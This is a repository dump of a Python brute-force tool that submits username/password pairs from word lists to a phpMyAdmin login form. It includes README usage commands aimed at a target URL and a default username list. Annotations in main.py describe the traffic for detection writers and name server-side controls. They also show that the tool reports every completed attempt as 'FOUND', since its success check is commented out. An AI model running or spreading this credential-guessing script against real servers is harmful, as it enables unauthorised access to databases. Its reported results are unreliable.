├── .gitignore ├── LICENSE ├── README.md ├── main.py ├── password.txt └── users.txt /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | MANIFEST 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 31 | *.manifest 32 | *.spec 33 | 34 | # Installer logs 35 | pip-log.txt 36 | pip-delete-this-directory.txt 37 | 38 | # Unit test / coverage reports 39 | htmlcov/ 40 | .tox/ 41 | .coverage 42 | .coverage.* 43 | .cache 44 | nosetests.xml 45 | coverage.xml 46 | *.cover 47 | .hypothesis/ 48 | .pytest_cache/ 49 | 50 | # Translations 51 | *.mo 52 | *.pot 53 | 54 | # Django stuff: 55 | *.log 56 | local_settings.py 57 | db.sqlite3 58 | 59 | # Flask stuff: 60 | instance/ 61 | .webassets-cache 62 | 63 | # Scrapy stuff: 64 | .scrapy 65 | 66 | # Sphinx documentation 67 | docs/_build/ 68 | 69 | # PyBuilder 70 | target/ 71 | 72 | # Jupyter Notebook 73 | .ipynb_checkpoints 74 | 75 | # pyenv 76 | .python-version 77 | 78 | # celery beat schedule file 79 | celerybeat-schedule 80 | 81 | # SageMath parsed files 82 | *.sage.py 83 | 84 | # Environments 85 | .env 86 | .venv 87 | env/ 88 | venv/ 89 | ENV/ 90 | env.bak/ 91 | venv.bak/ 92 | 93 | # Spyder project settings 94 | .spyderproject 95 | .spyproject 96 | 97 | # Rope project settings 98 | .ropeproject 99 | 100 | # mkdocs documentation 101 | /site 102 | 103 | # mypy 104 | .mypy_cache/ 105 | -------------------------------------------------------------------------------- /LICENSE: 
-------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 Safflower 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | 
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # phpMyAdmin Authentication Bruteforce
2 | 
3 | tested on `phpMyAdmin 4.9.0.1`
4 | 
5 | `password.txt` file's source is:
6 | 
7 | 
8 | Usage:
9 | ```
10 | python3 main.py -url http://example.com/pma/ -user root -pdict password.txt
11 | ```
12 | OR
13 | ```
14 | python3 main.py -url http://example.com/pma/ -udict users.txt -pdict password.txt
15 | ```
16 | 
--------------------------------------------------------------------------------
/main.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# Command-line script that submits username/password pairs from word lists to a
# phpMyAdmin login form, starting one thread per pair.
#
# Traffic shape, for anyone writing detections from this listing: login() issues a
# GET of the login page followed by a POST to the same URL, and repeats that pair
# three times per credential pair because its retry loop has no early exit.
# bruteforce() starts a new thread every 0.2 s, so one source produces a steady
# stream of GET/POST pairs against a single URL. The set_session/token form fields
# are simply re-read from the page on every attempt; the server-side controls that
# bound this kind of traffic are per-source failed-login thresholds, phpMyAdmin's
# AllowDeny rules and AllowRoot setting ($cfg['Servers'][$i][...]), and not exposing
# the login page publicly.
#
# NOTE(review): the indentation below was reconstructed from a listing that had
# lost it. Placement is forced by syntax everywhere except the two lines marked
# with their own NOTE(review).

# `arg`, `thread` and `sys` are not referenced anywhere in this file as shown.
from ast import arg
from concurrent.futures import thread
import sys
import requests
import html
import re
import os
import argparse
import threading, time

# Module-level flag that bruteforce() reads before starting each thread.
stop_flag = 0

def login(url, username, password):
    """Submit one username/password pair to the phpMyAdmin login form at *url*.

    Fetches the login page, copies its cookies and the hidden ``set_session``
    and ``token`` field values, and POSTs them together with the credentials.
    The sequence runs three times (``range(3)``); nothing in the loop returns
    or breaks, and any exception raised inside an iteration is discarded by
    the bare ``except``.

    Returns None. The only outputs are the printed lines and ``found.txt``.
    """

    for i in range(3):
        try:
            res = requests.get(url)
            # Cookies set by the GET are sent back with the POST below.
            cookies = dict(res.cookies)
            data = {
                # If either hidden field is missing from the page, re.search() returns
                # None and .group(1) raises AttributeError, which the bare except hides.
                'set_session': html.unescape(re.search(r"name=\"set_session\" value=\"(.+?)\"", res.text, re.I).group(1)),
                'token': html.unescape(re.search(r"name=\"token\" value=\"(.+?)\"", res.text, re.I).group(1)),
                'pma_username': username,
                'pma_password': password,
            }
            res = requests.post(url, cookies=cookies, data=data)
            cookies = dict(res.cookies)
            # The cookie check on the next line is disabled. With it commented out,
            # nothing below inspects the response, so the FOUND line and found.txt are
            # produced whenever the GET and POST complete without raising; they do not
            # indicate that the server accepted the credentials.
            #return 'pmaAuth-1' in cookies
            print("[*] FOUND - %s / %s" % (username, password))
            # Mode "w" truncates the file on every write; the pair is stored in
            # cleartext in the current working directory.
            f = open("found.txt", "w")
            f.write("%s / %s\n" % (username, password))
            f.close()
            # There is no `global stop_flag` statement in this function, so this
            # assignment binds a local name; the module-level stop_flag stays 0.
            stop_flag = 1
        except:
            # Swallows every exception, including network errors and the
            # AttributeError from a failed field match.
            pass
    # NOTE(review): indentation lost in the listing; placed at function level on the
    # assumption that it runs once after the loop. Since the loop never returns,
    # this line is then printed for every pair. Confirm against the repository.
    print("[!] FAILED - %s / %s" % (username, password))


def bruteforce(users, passwords, url):
    """Start one login() thread for every (user, password) combination.

    Iterates users in the outer loop and passwords in the inner loop, waits
    0.2 s after starting each thread, and checks the module-level
    ``stop_flag`` before each start. As written, no code in this file sets
    that module-level flag to 1, so the stop branch is not reached.

    ``t`` always refers to the most recently started thread, so each
    ``t.join()`` waits for that thread only, not for earlier ones.
    """
    for user in users:
        for password in passwords:
            try:
                if stop_flag == 1:
                    t.join()
                    exit()
                t = threading.Thread(target = login, args = (url, user, password))
                t.start()
                # Fixed delay between thread starts; threads are not otherwise limited.
                time.sleep(0.2)
            except KeyboardInterrupt:
                # Ctrl-C: wait for the latest thread, report, and stop.
                t.join()
                print("Cancelling")
                exit()

    # NOTE(review): indentation lost in the listing; placed at function level on the
    # assumption that it runs once after both loops. Confirm against the repository.
    t.join()



def main():
    """Parse the command line, load the word lists and call bruteforce().

    Prints the help text and returns when ``-url`` is not given. Returns
    after an error message when the password file cannot be read. When the
    username file cannot be read, falls back to the single ``-user`` value.
    """
    # The example in the description shows `-dict`; the option defined below is `-pdict`.
    parser = argparse.ArgumentParser(description='e.g. python3 %s -url http://example.com/pma/ -user root -dict password.txt' % (os.path.basename(__file__)))
    parser.add_argument('-url', help='The URL of target website')
    parser.add_argument('-user', default='root', help='The username of MySQL (default: root)')
    parser.add_argument('-udict', default='none.txt', help='The file path of username dictionary (default: NULL)')
    parser.add_argument('-pdict', default='password.txt', help='The file path of password dictionary (default: password.txt)')

    args = parser.parse_args()
    url = args.url
    pwdDictionary = args.pdict
    userDictionary = args.udict

    if url is None:
        parser.print_help()
        return

    #Getting passwords
    try:
        f = open(pwdDictionary, "r")
        # Splits on runs of CR/LF; a file that ends with a newline leaves an empty
        # string as the last entry.
        passwords = re.split("[\r\n]+", f.read())
        f.close()
    except:
        print("[-] Failed to read '%s' file." % (pwdDictionary))
        return

    #Getting users
    try:
        f = open(userDictionary, "r")
        users = re.split("[\r\n]+", f.read())
        f.close()
    except:
        # Any failure reading the username file (including the default 'none.txt'
        # not existing) selects the single -user value instead.
        users = [args.user]

    bruteforce(users, passwords, url)


if __name__ == '__main__':
    main()

--------------------------------------------------------------------------------
/users.txt:
--------------------------------------------------------------------------------
1 | root
2 | admin
3 | user
--------------------------------------------------------------------------------